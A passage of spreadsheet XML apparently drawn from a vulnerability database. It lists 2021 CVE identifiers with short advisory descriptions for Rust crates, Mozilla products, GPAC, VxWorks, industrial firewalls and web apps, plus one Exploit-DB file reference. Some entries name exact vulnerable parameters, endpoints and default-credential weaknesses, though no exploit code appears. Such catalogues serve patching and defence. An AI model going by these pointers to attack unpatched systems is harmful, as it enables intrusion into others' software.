    <t>Go before 1.17 does not properly consider extraneous zero characters at the beginning of an IP address octet, which (in some situations) allows attackers to bypass access control that is based on IP addresses, because of unexpected octal interpretation. This affects net.ParseIP and net.ParseCIDR.</t>
  </si>
  <si>
    <t>CVE-2021-29929</t>
  </si>
  <si>
    <t>An issue was discovered in the endian_trait crate through 2021-01-04 for Rust. A double drop can occur when a user-provided Endian impl panics.</t>
  </si>
  <si>
    <t>CVE-2021-29930</t>
  </si>
  <si>
    <t>An issue was discovered in the arenavec crate through 2021-01-12 for Rust. A drop of uninitialized memory can sometimes occur upon a panic in T::default().</t>
  </si>
  <si>
    <t>CVE-2021-29931</t>
  </si>
  <si>
    <t>An issue was discovered in the arenavec crate through 2021-01-12 for Rust. A double drop can sometimes occur upon a panic in T::drop().</t>
  </si>
  <si>
    <t>CVE-2021-29932</t>
  </si>
  <si>
    <t>An issue was discovered in the parse_duration crate through 2021-03-18 for Rust. It allows attackers to cause a denial of service (CPU and memory consumption) via a duration string with a large exponent.</t>
  </si>
  <si>
    <t>CVE-2021-29933</t>
  </si>
  <si>
    <t>An issue was discovered in the insert_many crate through 2021-01-26 for Rust. Elements may be dropped twice if a .next() method panics.</t>
  </si>
  <si>
    <t>CVE-2021-29934</t>
  </si>
  <si>
    <t>An issue was discovered in PartialReader in the uu_od crate before 0.0.4 for Rust. Attackers can read the contents of uninitialized memory locations via a user-provided Read operation.</t>
  </si>
  <si>
    <t>CVE-2021-29935</t>
  </si>
  <si>
    <t>An issue was discovered in the rocket crate before 0.4.7 for Rust. uri::Formatter can have a use-after-free if a user-provided function panics.</t>
  </si>
  <si>
    <t>CVE-2021-29936</t>
  </si>
  <si>
    <t>An issue was discovered in the adtensor crate through 2021-01-11 for Rust. There is a drop of uninitialized memory via the FromIterator implementation for Vector and Matrix.</t>
  </si>
  <si>
    <t>CVE-2021-29937</t>
  </si>
  <si>
    <t>An issue was discovered in the telemetry crate through 2021-02-17 for Rust. There is a drop of uninitialized memory if a value.clone() call panics within misc::vec_with_size().</t>
  </si>
  <si>
    <t>CVE-2021-29938</t>
  </si>
  <si>
    <t>An issue was discovered in the slice-deque crate through 2021-02-19 for Rust. A double drop can occur in SliceDeque::drain_filter upon a panic in a predicate function.</t>
  </si>
  <si>
    <t>CVE-2021-29939</t>
  </si>
  <si>
    <t>An issue was discovered in the stackvector crate through 2021-02-19 for Rust. There is an out-of-bounds write in StackVec::extend if size_hint provides certain anomalous data.</t>
  </si>
  <si>
    <t>CVE-2021-29940</t>
  </si>
  <si>
    <t>An issue was discovered in the through crate through 2021-02-18 for Rust. There is a double free (in through and through_and) upon a panic of the map function.</t>
  </si>
  <si>
    <t>CVE-2021-29941</t>
  </si>
  <si>
    <t>An issue was discovered in the reorder crate through 2021-02-24 for Rust. swap_index has an out-of-bounds write if an iterator returns a len() that is too small.</t>
  </si>
  <si>
    <t>CVE-2021-29942</t>
  </si>
  <si>
    <t>An issue was discovered in the reorder crate through 2021-02-24 for Rust. swap_index can return uninitialized values if an iterator returns a len() that is too large.</t>
  </si>
  <si>
    <t>CVE-2021-29943</t>
  </si>
  <si>
    <t>When using ConfigurableInternodeAuthHadoopPlugin for authentication, Apache Solr versions prior to 8.8.2 would forward/proxy distributed requests using server credentials instead of original client credentials. This would result in incorrect authorization resolution on the receiving hosts.</t>
  </si>
  <si>
    <t>CVE-2021-29944</t>
  </si>
  <si>
    <t>Lack of escaping allowed HTML injection when a webpage was viewed in Reader View. While a Content Security Policy prevents direct code execution, HTML injection is still possible. *Note: This issue only affected Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 88.</t>
  </si>
  <si>
    <t>CVE-2021-29945</t>
  </si>
  <si>
    <t>The WebAssembly JIT could miscalculate the size of a return type, which could lead to a null read and result in a crash. *Note: This issue only affected x86-32 platforms. Other platforms are unaffected.*. This vulnerability affects Firefox ESR &lt; 78.10, Thunderbird &lt; 78.10, and Firefox &lt; 88.</t>
  </si>
  <si>
    <t>CVE-2021-29946</t>
  </si>
  <si>
    <t>Ports that were written as an integer overflow above the bounds of a 16-bit integer could have bypassed port blocking restrictions when used in the Alt-Svc header. This vulnerability affects Firefox ESR &lt; 78.10, Thunderbird &lt; 78.10, and Firefox &lt; 88.</t>
  </si>
  <si>
    <t>CVE-2021-29947</t>
  </si>
  <si>
    <t>Mozilla developers and community members reported memory safety bugs present in Firefox 87. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 88.</t>
  </si>
  <si>
    <t>CVE-2021-29948</t>
  </si>
  <si>
    <t>Signatures are written to disk before and read during verification, which might be subject to a race condition when a malicious local process or user is replacing the file. This vulnerability affects Thunderbird &lt; 78.10.</t>
  </si>
  <si>
    <t>CVE-2021-29949</t>
  </si>
  <si>
    <t>When loading the shared library that provides the OTR protocol implementation, Thunderbird will initially attempt to open it using a filename that isn't distributed by Thunderbird. If a computer has already been infected with a malicious library of the alternative filename, and the malicious library has been copied to a directory that is contained in the search path for executable libraries, then Thunderbird will load the incorrect library. This vulnerability affects Thunderbird &lt; 78.9.1.</t>
  </si>
  <si>
    <t>CVE-2021-29950</t>
  </si>
  <si>
    <t>Thunderbird unprotects a secret OpenPGP key prior to using it for a decryption, signing or key import task. If the task runs into a failure, the secret key may remain in memory in its unprotected state. This vulnerability affects Thunderbird &lt; 78.8.1.</t>
  </si>
  <si>
    <t>CVE-2021-29951</t>
  </si>
  <si>
    <t>The Mozilla Maintenance Service granted SERVICE_START access to BUILTIN|Users which, in a domain network, grants normal remote users access to start or stop the service. This could be used to prevent the browser update service from operating (if an attacker spammed the 'Stop' command); but also exposed attack surface in the maintenance service. *Note: This issue only affected Windows operating systems older than Win 10 build 1709. Other operating systems are unaffected.*. This vulnerability affects Thunderbird &lt; 78.10.1, Firefox &lt; 87, and Firefox ESR &lt; 78.10.1.</t>
  </si>
  <si>
    <t>CVE-2021-29952</t>
  </si>
  <si>
    <t>When Web Render components were destructed, a race condition could have caused undefined behavior, and we presume that with enough effort may have been exploitable to run arbitrary code. This vulnerability affects Firefox &lt; 88.0.1 and Firefox for Android &lt; 88.1.3.</t>
  </si>
  <si>
    <t>CVE-2021-29953</t>
  </si>
  <si>
    <t>A malicious webpage could have forced a Firefox for Android user into executing attacker-controlled JavaScript in the context of another domain, resulting in a Universal Cross-Site Scripting vulnerability. *Note: This issue only affected Firefox for Android. Other operating systems are unaffected. Further details are being temporarily withheld to allow users an opportunity to update.*. This vulnerability affects Firefox &lt; 88.0.1 and Firefox for Android &lt; 88.1.3.</t>
  </si>
  <si>
    <t>CVE-2021-29954</t>
  </si>
  <si>
    <t>Proxy functionality built into Hubs Cloud’s Reticulum software allowed access to internal URLs, including the metadata service. This vulnerability affects Hubs Cloud &lt; mozillareality/reticulum/1.0.1/20210428201255.</t>
  </si>
  <si>
    <t>CVE-2021-29955</t>
  </si>
  <si>
    <t>A transient execution vulnerability, named Floating Point Value Injection (FPVI) allowed an attacker to leak arbitrary memory addresses and may have also enabled JIT type confusion attacks. (A related vulnerability, Speculative Code Store Bypass (SCSB), did not affect Firefox.). This vulnerability affects Firefox ESR &lt; 78.9 and Firefox &lt; 87.</t>
  </si>
  <si>
    <t>CVE-2021-29956</t>
  </si>
  <si>
    <t>OpenPGP secret keys that were imported using Thunderbird version 78.8.1 up to version 78.10.1 were stored unencrypted on the user's local disk. The master password protection was inactive for those keys. Version 78.10.2 will restore the protection mechanism for newly imported keys, and will automatically protect keys that had been imported using affected Thunderbird versions. This vulnerability affects Thunderbird &lt; 78.10.2.</t>
  </si>
  <si>
    <t>CVE-2021-29957</t>
  </si>
  <si>
    <t>If a MIME encoded email contains an OpenPGP inline signed or encrypted message part, but also contains an additional unprotected part, Thunderbird did not indicate that only parts of the message are protected. This vulnerability affects Thunderbird &lt; 78.10.2.</t>
  </si>
  <si>
    <t>CVE-2021-29958</t>
  </si>
  <si>
    <t>When a download was initiated, the client did not check whether it was in normal or private browsing mode, which led to private mode cookies being shared in normal browsing mode. This vulnerability affects Firefox for iOS &lt; 34.</t>
  </si>
  <si>
    <t>CVE-2021-29959</t>
  </si>
  <si>
    <t>When a user has already allowed a website to access microphone and camera, disabling camera sharing would not fully prevent the website from re-enabling it without an additional prompt. This was only possible if the website kept recording with the microphone until re-enabling the camera. This vulnerability affects Firefox &lt; 89.</t>
  </si>
  <si>
    <t>CVE-2021-29960</t>
  </si>
  <si>
    <t>Firefox used to cache the last filename used for printing a file. When generating a filename for printing, Firefox usually suggests the web page title. The caching and suggestion techniques combined may have lead to the title of a website visited during private browsing mode being stored on disk. This vulnerability affects Firefox &lt; 89.</t>
  </si>
  <si>
    <t>CVE-2021-29961</t>
  </si>
  <si>
    <t>When styling and rendering an oversized `&lt;select&gt;` element, Firefox did not apply correct clipping which allowed an attacker to paint over the user interface. This vulnerability affects Firefox &lt; 89.</t>
  </si>
  <si>
    <t>CVE-2021-29962</t>
  </si>
  <si>
    <t>Firefox for Android would become unstable and hard-to-recover when a website opened too many popups. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 89.</t>
  </si>
  <si>
    <t>CVE-2021-29963</t>
  </si>
  <si>
    <t>Address bar search suggestions in private browsing mode were re-using session data from normal mode. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 89.</t>
  </si>
  <si>
    <t>CVE-2021-29964</t>
  </si>
  <si>
    <t>A locally-installed hostile program could send `WM_COPYDATA` messages that Firefox would process incorrectly, leading to an out-of-bounds read. *This bug only affects Firefox on Windows. Other operating systems are unaffected.*. This vulnerability affects Thunderbird &lt; 78.11, Firefox &lt; 89, and Firefox ESR &lt; 78.11.</t>
  </si>
  <si>
    <t>CVE-2021-29965</t>
  </si>
  <si>
    <t>A malicious website that causes an HTTP Authentication dialog to be spawned could trick the built-in password manager to suggest passwords for the currently active website instead of the website that triggered the dialog. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 89.</t>
  </si>
  <si>
    <t>CVE-2021-29966</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 88. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 89.</t>
  </si>
  <si>
    <t>CVE-2021-29967</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 88 and Firefox ESR 78.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird &lt; 78.11, Firefox &lt; 89, and Firefox ESR &lt; 78.11.</t>
  </si>
  <si>
    <t>CVE-2021-29968</t>
  </si>
  <si>
    <t>When drawing text onto a canvas with WebRender disabled, an out of bounds read could occur. *This bug only affects Firefox on Windows. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 89.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-29969</t>
  </si>
  <si>
    <t>If Thunderbird was configured to use STARTTLS for an IMAP connection, and an attacker injected IMAP server responses prior to the completion of the STARTTLS handshake, then Thunderbird didn't ignore the injected data. This could have resulted in Thunderbird showing incorrect information, for example the attacker could have tricked Thunderbird to show folders that didn't exist on the IMAP server. This vulnerability affects Thunderbird &lt; 78.12.</t>
  </si>
  <si>
    <t>CVE-2021-29970</t>
  </si>
  <si>
    <t>A malicious webpage could have triggered a use-after-free, memory corruption, and a potentially exploitable crash. *This bug could only be triggered when accessibility was enabled.*. This vulnerability affects Thunderbird &lt; 78.12, Firefox ESR &lt; 78.12, and Firefox &lt; 90.</t>
  </si>
  <si>
    <t>CVE-2021-29971</t>
  </si>
  <si>
    <t>If a user had granted a permission to a webpage and saved that grant, any webpage running on the same host - irrespective of scheme or port - would be granted that permission. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 90.</t>
  </si>
  <si>
    <t>CVE-2021-29972</t>
  </si>
  <si>
    <t>A use-after-free vulnerability was found via testing, and traced to an out-of-date Cairo library. Updating the library resolved the issue, and may have remediated other, unknown security vulnerabilities as well. This vulnerability affects Firefox &lt; 90.</t>
  </si>
  <si>
    <t>CVE-2021-29973</t>
  </si>
  <si>
    <t>Password autofill was enabled without user interaction on insecure websites on Firefox for Android. This was corrected to require user interaction with the page before a user's password would be entered by the browser's autofill functionality *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 90.</t>
  </si>
  <si>
    <t>CVE-2021-29974</t>
  </si>
  <si>
    <t>When network partitioning was enabled, e.g. as a result of Enhanced Tracking Protection settings, a TLS error page would allow the user to override an error on a domain which had specified HTTP Strict Transport Security (which implies that the error should not be override-able.) This issue did not affect the network connections, and they were correctly upgraded to HTTPS automatically. This vulnerability affects Firefox &lt; 90.</t>
  </si>
  <si>
    <t>CVE-2021-29975</t>
  </si>
  <si>
    <t>Through a series of DOM manipulations, a message, over which the attacker had control of the text but not HTML or formatting, could be overlaid on top of another domain (with the new domain correctly shown in the address bar) resulting in possible user confusion. This vulnerability affects Firefox &lt; 90.</t>
  </si>
  <si>
    <t>CVE-2021-29976</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in code shared between Firefox and Thunderbird. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird &lt; 78.12, Firefox ESR &lt; 78.12, and Firefox &lt; 90.</t>
  </si>
  <si>
    <t>CVE-2021-29977</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 89. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 90.</t>
  </si>
  <si>
    <t>CVE-2021-29978</t>
  </si>
  <si>
    <t>Multiple low security issues were discovered and fixed in a security audit of Mozilla VPN 2.x branch as part of a 3rd party security audit. This vulnerability affects Mozilla VPN &lt; 2.3.</t>
  </si>
  <si>
    <t>CVE-2021-29979</t>
  </si>
  <si>
    <t>Hubs Cloud allows users to download shared content, specifically HTML and JS, which could allow javascript execution in the Hub Cloud instance’s primary hosting domain.*. This vulnerability affects Hubs Cloud &lt; mozillareality/reticulum/1.0.1/20210618012634.</t>
  </si>
  <si>
    <t>CVE-2021-29980</t>
  </si>
  <si>
    <t>Uninitialized memory in a canvas object could have caused an incorrect free() leading to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird &lt; 78.13, Thunderbird &lt; 91, Firefox ESR &lt; 78.13, and Firefox &lt; 91.</t>
  </si>
  <si>
    <t>CVE-2021-29981</t>
  </si>
  <si>
    <t>An issue present in lowering/register allocation could have led to obscure but deterministic register confusion failures in JITted code that would lead to a potentially exploitable crash. This vulnerability affects Firefox &lt; 91 and Thunderbird &lt; 91.</t>
  </si>
  <si>
    <t>CVE-2021-29982</t>
  </si>
  <si>
    <t>Due to incorrect JIT optimization, we incorrectly interpreted data from the wrong type of object, resulting in the potential leak of a single bit of memory. This vulnerability affects Firefox &lt; 91 and Thunderbird &lt; 91.</t>
  </si>
  <si>
    <t>CVE-2021-29983</t>
  </si>
  <si>
    <t>Firefox for Android could get stuck in fullscreen mode and not exit it even after normal interactions that should cause it to exit. *Note: This issue only affected Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 91.</t>
  </si>
  <si>
    <t>CVE-2021-29984</t>
  </si>
  <si>
    <t>Instruction reordering resulted in a sequence of instructions that would cause an object to be incorrectly considered during garbage collection. This led to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird &lt; 78.13, Thunderbird &lt; 91, Firefox ESR &lt; 78.13, and Firefox &lt; 91.</t>
  </si>
  <si>
    <t>CVE-2021-29985</t>
  </si>
  <si>
    <t>A use-after-free vulnerability in media channels could have led to memory corruption and a potentially exploitable crash. This vulnerability affects Thunderbird &lt; 78.13, Thunderbird &lt; 91, Firefox ESR &lt; 78.13, and Firefox &lt; 91.</t>
  </si>
  <si>
    <t>CVE-2021-29986</t>
  </si>
  <si>
    <t>A suspected race condition when calling getaddrinfo led to memory corruption and a potentially exploitable crash. *Note: This issue only affected Linux operating systems. Other operating systems are unaffected.* This vulnerability affects Thunderbird &lt; 78.13, Thunderbird &lt; 91, Firefox ESR &lt; 78.13, and Firefox &lt; 91.</t>
  </si>
  <si>
    <t>CVE-2021-29987</t>
  </si>
  <si>
    <t>After requesting multiple permissions, and closing the first permission panel, subsequent permission panels will be displayed in a different position but still record a click in the default location, making it possible to trick a user into accepting a permission they did not want to. *This bug only affects Firefox on Linux. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 91 and Thunderbird &lt; 91.</t>
  </si>
  <si>
    <t>CVE-2021-29988</t>
  </si>
  <si>
    <t>Firefox incorrectly treated an inline list-item element as a block element, resulting in an out of bounds read or memory corruption, and a potentially exploitable crash. This vulnerability affects Thunderbird &lt; 78.13, Thunderbird &lt; 91, Firefox ESR &lt; 78.13, and Firefox &lt; 91.</t>
  </si>
  <si>
    <t>CVE-2021-29989</t>
  </si>
  <si>
    <t>Mozilla developers reported memory safety bugs present in Firefox 90 and Firefox ESR 78.12. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Thunderbird &lt; 78.13, Firefox ESR &lt; 78.13, and Firefox &lt; 91.</t>
  </si>
  <si>
    <t>CVE-2021-29990</t>
  </si>
  <si>
    <t>Mozilla developers and community members reported memory safety bugs present in Firefox 90. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox &lt; 91.</t>
  </si>
  <si>
    <t>CVE-2021-29991</t>
  </si>
  <si>
    <t>Firefox incorrectly accepted a newline in a HTTP/3 header, interpretting it as two separate headers. This allowed for a header splitting attack against servers using HTTP/3. This vulnerability affects Firefox &lt; 91.0.1 and Thunderbird &lt; 91.0.1.</t>
  </si>
  <si>
    <t>CVE-2021-29993</t>
  </si>
  <si>
    <t>Firefox for Android allowed navigations through the `intent://` protocol, which could be used to cause crashes and UI spoofs. *This bug only affects Firefox for Android. Other operating systems are unaffected.*. This vulnerability affects Firefox &lt; 92.</t>
  </si>
  <si>
    <t>CVE-2021-29994</t>
  </si>
  <si>
    <t>Cloudera Hue 4.6.0 allows XSS.</t>
  </si>
  <si>
    <t>CVE-2021-29995</t>
  </si>
  <si>
    <t>A Cross Site Request Forgery (CSRF) issue in Server Console in CloverDX through 5.9.0 allows remote attackers to execute any action as the logged-in user (including script execution). The issue is resolved in CloverDX 5.10, CloverDX 5.9.1, CloverDX 5.8.2, and CloverDX 5.7.1.</t>
  </si>
  <si>
    <t>CVE-2021-29996</t>
  </si>
  <si>
    <t>Mark Text through 0.16.3 allows attackers arbitrary command execution. This could lead to Remote Code Execution (RCE) by opening .md files containing a mutation Cross Site Scripting (XSS) payload.</t>
  </si>
  <si>
    <t>CVE-2021-29997</t>
  </si>
  <si>
    <t>An issue was discovered in Wind River VxWorks 7 before 21.03. A specially crafted packet may lead to buffer over-read on IKE.</t>
  </si>
  <si>
    <t>CVE-2021-29998</t>
  </si>
  <si>
    <t>An issue was discovered in Wind River VxWorks before 6.5. There is a possible heap overflow in dhcp client.</t>
  </si>
  <si>
    <t>CVE-2021-29999</t>
  </si>
  <si>
    <t>An issue was discovered in Wind River VxWorks through 6.8. There is a possible stack overflow in dhcp server.</t>
  </si>
  <si>
    <t>CVE-2021-30000</t>
  </si>
  <si>
    <t>An issue was discovered in LATRIX 0.6.0. SQL injection in the txtaccesscode parameter of inandout.php leads to information disclosure and code execution.</t>
  </si>
  <si>
    <t>CVE-2021-30002</t>
  </si>
  <si>
    <t>An issue was discovered in the Linux kernel before 5.11.3 when a webcam device exists. video_usercopy in drivers/media/v4l2-core/v4l2-ioctl.c has a memory leak for large arguments, aka CID-fb18802a338b.</t>
  </si>
  <si>
    <t>CVE-2021-30003</t>
  </si>
  <si>
    <t>An issue was discovered on Nokia G-120W-F 3FE46606AGAB91 devices. There is Stored XSS in the administrative interface via urlfilter.cgi?add url_address.</t>
  </si>
  <si>
    <t>CVE-2021-30004</t>
  </si>
  <si>
    <t>In wpa_supplicant and hostapd 2.9, forging attacks may occur because AlgorithmIdentifier parameters are mishandled in tls/pkcs1.c and tls/x509v3.c.</t>
  </si>
  <si>
    <t>CVE-2021-30005</t>
  </si>
  <si>
    <t>In JetBrains PyCharm before 2020.3.4, local code execution was possible because of insufficient checks when getting the project from VCS.</t>
  </si>
  <si>
    <t>CVE-2021-30006</t>
  </si>
  <si>
    <t>In IntelliJ IDEA before 2020.3.3, XXE was possible, leading to information disclosure.</t>
  </si>
  <si>
    <t>CVE-2021-30014</t>
  </si>
  <si>
    <t>There is a integer overflow in media_tools/av_parsers.c in the hevc_parse_slice_segment function in GPAC 1.0.1 which results in a crash.</t>
  </si>
  <si>
    <t>CVE-2021-30015</t>
  </si>
  <si>
    <t>There is a Null Pointer Dereference in function filter_core/filter_pck.c:gf_filter_pck_new_alloc_internal in GPAC 1.0.1. The pid comes from function av1dmx_parse_flush_sample, the ctx.opid maybe NULL. The result is a crash in gf_filter_pck_new_alloc_internal.</t>
  </si>
  <si>
    <t>CVE-2021-30019</t>
  </si>
  <si>
    <t>In the adts_dmx_process function in filters/reframe_adts.c in GPAC 1.0.1, a crafted file may cause ctx-&gt;hdr.frame_size to be smaller than ctx-&gt;hdr.hdr_size, resulting in size to be a negative number and a heap overflow in the memcpy.</t>
  </si>
  <si>
    <t>CVE-2021-3002</t>
  </si>
  <si>
    <t>Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30020</t>
  </si>
  <si>
    <t>In the function gf_hevc_read_pps_bs_internal function in media_tools/av_parsers.c in GPAC 1.0.1 there is a loop, which with crafted file, pps-&gt;num_tile_columns may be larger than sizeof(pps-&gt;column_width), which results in a heap overflow in the loop.</t>
  </si>
  <si>
    <t>CVE-2021-30022</t>
  </si>
  <si>
    <t>There is a integer overflow in media_tools/av_parsers.c in the gf_avc_read_pps_bs_internal in GPAC 1.0.1. pps_id may be a negative number, so it will not return. However, avc-&gt;pps only has 255 unit, so there is an overflow, which results a crash.</t>
  </si>
  <si>
    <t>CVE-2021-30027</t>
  </si>
  <si>
    <t>md_analyze_line in md4c.c in md4c 0.4.7 allows attackers to trigger use of uninitialized memory, and cause a denial of service via a malformed Markdown document.</t>
  </si>
  <si>
    <t>CVE-2021-30028</t>
  </si>
  <si>
    <t>SOOTEWAY Wi-Fi Range Extender v1.5 was discovered to use default credentials (the admin password for the admin account) to access the TELNET service, allowing attackers to erase/read/write the firmware remotely.</t>
  </si>
  <si>
    <t>CVE-2021-3003</t>
  </si>
  <si>
    <t>Agenzia delle Entrate Desktop Telematico 1.0.0 contacts the jws.agenziaentrate.it server over cleartext HTTP, which allows man-in-the-middle attackers to spoof product updates.</t>
  </si>
  <si>
    <t>CVE-2021-30030</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Remote Clinic v2.0 via the Full Name field on register-patient.php.</t>
  </si>
  <si>
    <t>CVE-2021-30034</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Remote Clinic v2.0 via the Symptons field on patients/register-report.php.</t>
  </si>
  <si>
    <t>CVE-2021-30039</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Remote Clinic v2.0 via the "Fever" or "Blood Pressure" field on the patients/register-report.php.</t>
  </si>
  <si>
    <t>CVE-2021-3004</t>
  </si>
  <si>
    <t>The _deposit function in the smart contract implementation for Stable Yield Credit (yCREDIT), an Ethereum token, has certain incorrect calculations. An attacker can obtain more yCREDIT tokens than they should.</t>
  </si>
  <si>
    <t>exploits/php/webapps/49781.py</t>
  </si>
  <si>
    <t>RemoteClinic 2 - 'Multiple' Cross-Site Scripting (XSS)</t>
  </si>
  <si>
    <t>2021-04-21</t>
  </si>
  <si>
    <t>CVE-2021-30042</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Remote Clinic v2.0 via the "Clinic Name", "Clinic Address", "Clinic City", or "Clinic Contact" field on clinics/register.php</t>
  </si>
  <si>
    <t>CVE-2021-30044</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) in Remote Clinic v2.0 via the First Name or Last Name field on staff/register.php.</t>
  </si>
  <si>
    <t>CVE-2021-30045</t>
  </si>
  <si>
    <t>SerenityOS 2021-03-27 contains a buffer overflow vulnerability in the EndOfCentralDirectory::read() function.</t>
  </si>
  <si>
    <t>CVE-2021-30046</t>
  </si>
  <si>
    <t>VIGRA Computer Vision Library Version-1-11-1 contains a segmentation fault vulnerability in the impex.hxx read_image_band() function, in which a crafted file can cause a denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-30048</t>
  </si>
  <si>
    <t>Directory Traversal in the fileDownload function in com/java2nb/common/controller/FileController.java in Novel-plus (?????-plus) 3.5.1 allows attackers to read arbitrary files via the filePath parameter.</t>
  </si>
  <si>
    <t>CVE-2021-30049</t>
  </si>
  <si>
    <t>SysAid 20.3.64 b14 is affected by Cross Site Scripting (XSS) via a /KeepAlive.jsp?stamp= URI.</t>
  </si>
  <si>
    <t>CVE-2021-3005</t>
  </si>
  <si>
    <t>MK-AUTH through 19.01 K4.9 allows remote attackers to obtain sensitive information (e.g., a CPF number) via a modified titulo (aka invoice number) value to the central/recibo.php URI.</t>
  </si>
  <si>
    <t>CVE-2021-30055</t>
  </si>
  <si>
    <t>A SQL injection vulnerability in Knowage Suite version 7.1 exists in the documentexecution/url analytics driver component via the 'par_year' parameter when running a report.</t>
  </si>
  <si>
    <t>CVE-2021-30056</t>
  </si>
  <si>
    <t>Knowage Suite before 7.4 is vulnerable to reflected cross-site scripting (XSS). An attacker can inject arbitrary web script in /restful-services/publish via the 'EXEC_FROM' parameter that can lead to data leakage.</t>
  </si>
  <si>
    <t>CVE-2021-30057</t>
  </si>
  <si>
    <t>A stored HTML injection vulnerability exists in Knowage Suite version 7.1. An attacker can inject arbitrary HTML in "/restful-services/2.0/analyticalDrivers" via the 'LABEL' and 'NAME' parameters.</t>
  </si>
  <si>
    <t>CVE-2021-30058</t>
  </si>
  <si>
    <t>Knowage Suite before 7.4 is vulnerable to cross-site scripting (XSS). An attacker can inject arbitrary external script in '/knowagecockpitengine/api/1.0/pages/execute' via the 'SBI_HOST' parameter.</t>
  </si>
  <si>
    <t>CVE-2021-3006</t>
  </si>
  <si>
    <t>The breed function in the smart contract implementation for Farm in Seal Finance (Seal), an Ethereum token, lacks access control and thus allows price manipulation, as exploited in the wild in December 2020 and January 2021.</t>
  </si>
  <si>
    <t>CVE-2021-30061</t>
  </si>
  <si>
    <t>On Schneider Electric ConneXium Tofino Firewall TCSEFEA23F3F22 before 03.23, TCSEFEA23F3F20/21, and Belden Tofino Xenon Security Appliance, physically proximate attackers can execute code via a crafted file on a USB stick.</t>
  </si>
  <si>
    <t>CVE-2021-30062</t>
  </si>
  <si>
    <t>On Schneider Electric ConneXium Tofino OPCLSM TCSEFM0000 before 03.23 and Belden Tofino Xenon Security Appliance, crafted OPC packets can bypass the OPC enforcer.</t>
  </si>
  <si>
    <t>CVE-2021-30063</t>
  </si>
  <si>
    <t>On Schneider Electric ConneXium Tofino OPCLSM TCSEFM0000 before 03.23 and Belden Tofino Xenon Security Appliance, crafted OPC packets can cause an OPC enforcer denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-30064</t>
  </si>
  <si>
    <t>On Schneider Electric ConneXium Tofino Firewall TCSEFEA23F3F22 before 03.23, TCSEFEA23F3F20/21, and Belden Tofino Xenon Security Appliance, an SSH login can succeed with hardcoded default credentials (if the device is in the uncommissioned state).</t>
  </si>
  <si>
    <t>CVE-2021-30065</t>
  </si>
  <si>
    <t>On Schneider Electric ConneXium Tofino Firewall TCSEFEA23F3F22 before 03.23, TCSEFEA23F3F20/21, and Belden Tofino Xenon Security Appliance, crafted ModBus packets can bypass the ModBus enforcer. NOTE: this issue exists because of an incomplete fix of CVE-2017-11401.</t>
  </si>
  <si>
    <t>CVE-2021-30066</t>
  </si>
  <si>
    <t>On Schneider Electric ConneXium Tofino Firewall TCSEFEA23F3F22 before 03.23, TCSEFEA23F3F20/21, and Belden Tofino Xenon Security Appliance, an arbitrary firmware image can be loaded because firmware signature verification (for a USB stick) can be bypassed. NOTE: this issue exists because of an incomplete fix of CVE-2017-11400.</t>
  </si>
  <si>
    <t>CVE-2021-3007</t>
  </si>
  <si>
    <t>** DISPUTED ** Laminas Project laminas-http before 2.14.2, and Zend Framework 3.0.0, has a deserialization vulnerability that can lead to remote code execution if the content is controllable, related to the __destruct method of the Zend\Http\Response\Stream class in Stream.php. NOTE: Zend Framework is no longer supported by the maintainer. NOTE: the laminas-http vendor considers this a "vulnerability in the PHP language itself" but has added certain type checking as a way to prevent exploitation in (unrecommended) use cases where attacker-supplied data can be deserialized.</t>
  </si>
  <si>
    <t>CVE-2021-30070</t>
  </si>
  <si>
    <t>An issue was discovered in HestiaCP before v1.3.5. Attackers are able to arbitrarily install packages due to values taken from the pgk [] parameter in the update request being transmitted to the operating system's package manager.</t>
  </si>
  <si>
    <t>CVE-2021-30071</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in /admin/list_key.html of HestiaCP before v1.3.5 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.</t>
  </si>
  <si>
    <t>CVE-2021-30072</t>
  </si>
  <si>
    <t>An issue was discovered in prog.cgi on D-Link DIR-878 1.30B08 devices. Because strcat is misused, there is a stack-based buffer overflow that does not require authentication.</t>
  </si>
  <si>
    <t>CVE-2021-30074</t>
  </si>
  <si>
